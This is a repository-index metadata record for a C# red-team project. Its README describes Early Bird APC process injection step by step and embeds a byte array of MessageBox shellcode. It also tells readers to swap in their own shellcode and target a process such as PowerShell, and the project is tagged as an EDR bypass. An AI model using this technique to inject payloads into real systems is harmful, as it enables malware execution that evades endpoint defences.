{"id":19369431,"url":"https://github.com/kara-4search/earlybirdinjection_csharp","last_synced_at":"2025-07-17T07:36:31.215Z","repository":{"id":136106629,"uuid":"401338981","full_name":"Kara-4search/EarlyBirdInjection_CSharp","owner":"Kara-4search","description":"Inject shellcode into process via \"EarlyBird\"","archived":false,"fork":false,"pushed_at":"2021-08-30T13:35:15.000Z","size":27,"stargazers_count":26,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-23T15:46:57.403Z","etag":null,"topics":["apc","bypass","csharp","earlybird","edr","injection","process-injection","redteam","shellcode"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kara-4search.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-08-30T12:39:49.000Z","updated_at":"2025-03-13T21:00:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"77b8fc45-2dd6-4e25-ad27-68c64e75dddb","html_url":"https://github.com/Kara-4search/EarlyBirdInjection_CSharp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Kara-4search/EarlyBirdInjection_CSharp","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kara-4search","download_url":"https://codeload.github.com/Kara-4search/EarlyBirdInjection_CSharp/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FEarlyBirdInjection_CSharp/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":265578037,"owners_count":23791277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apc","bypass","csharp","earlybird","edr","injection","process-injection","redteam","shellcode"],"created_at":"2024-11-10T08:11:16.374Z","updated_at":"2025-07-17T07:36:31.194Z","avatar_url":"https://github.com/Kara-4search.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# EarlyBirdInjection_CSharp\n\nBlog link: working on it\n\n- EarlyBirdInjection, process injection technique.\n- Only tested on win10/x64, works fine.\n- Some simplified context around threads and APC queues:\n\t1. Threads execute code within processes\n\t2. Threads can execute code asynchronously by leveraging APC queues\n\t3. Each thread has a queue that stores all the APCs\n\t4. Application can queue an APC to a given thread (subject to privileges)\n\t5. **When a thread is scheduled, queued APCs get executed.**\n\t6. Disadvantage of this technique is that the malicious program cannot force the victim thread to execute the injected code - the thread to which an APC was queued to, needs to enter/be in an alert state (i.e SleepEx), but you may want to check out Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert\n\t\n- Steps\n\t1. Find process id.\n\t2. Open process \n\t3. Allocate memory into process memory space.\n\t4. Write shellcode into the process memory space.\n\t5. Create a thread with a suspended state.\n\t6. Queue an APC to the threads.\n\t7. ResumeThread.\n\t\n- The shellcode below is a messagebox\n```\n            /*   Messagebox shellcode   */\n            byte[] buf1 = new byte[323] {\n            0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,\n            0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,\n            0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,\n            0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,\n            0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,\n            0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,\n            0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,\n            0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,\n            0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,\n            0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,\n            0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,\n            0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,\n            0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,\n            0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,\n            0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,\n            0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,\n            0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,\n            0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,\n            0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,\n            0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,\n            0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,\n            0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };\n\t\t\t\n```\n\n## Usage \n1. Replace the shellcode with your own.\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/EarlyBirdInject_shellcode.png)\n2. Set the process name you want to inject\n\t* default name in the project is Powershell.\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/EarlyBirdInject_processname.png)\n3. And the messagebox show up.\n\t![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/EarlyBirdInject_messagebox.png)\n\t\n\t\n## TO-DO list\n- NONE\n\n## Update history\n- NONE\n\n## Reference link:\n\t1. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html\n\t2. https://idiotc4t.com/code-and-dll-process-injection/apc-and-nttestalert-code-execute\n\t3. https://idiotc4t.com/code-and-dll-process-injection/apc-injection\n\t4. https://idiotc4t.com/code-and-dll-process-injection/apc-thread-hijack\n\t5. https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert\n\t6. https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n\t7. https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection\n\t8. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread\n\t9. http://pinvoke.net/default.aspx/kernel32/CreateRemoteThread.html\n\t10. https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex\n\t11. https://malcomvetter.medium.com/net-process-injection-1a1af00359bc\n\t12. https://github.com/pwndizzle/c-sharp-memory-injection/blob/master/apc-injection-new-process.cs\n\t13. https://introspelliam.github.io/2017/06/22/tools/关于metasploit的EXITFUNC参数的解释/\n\t14. http://garage4hackers.com/showthread.php?t=1820\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkara-4search%2Fearlybirdinjection_csharp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkara-4search%2Fearlybirdinjection_csharp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkara-4search%2Fearlybirdinjection_csharp/lists"}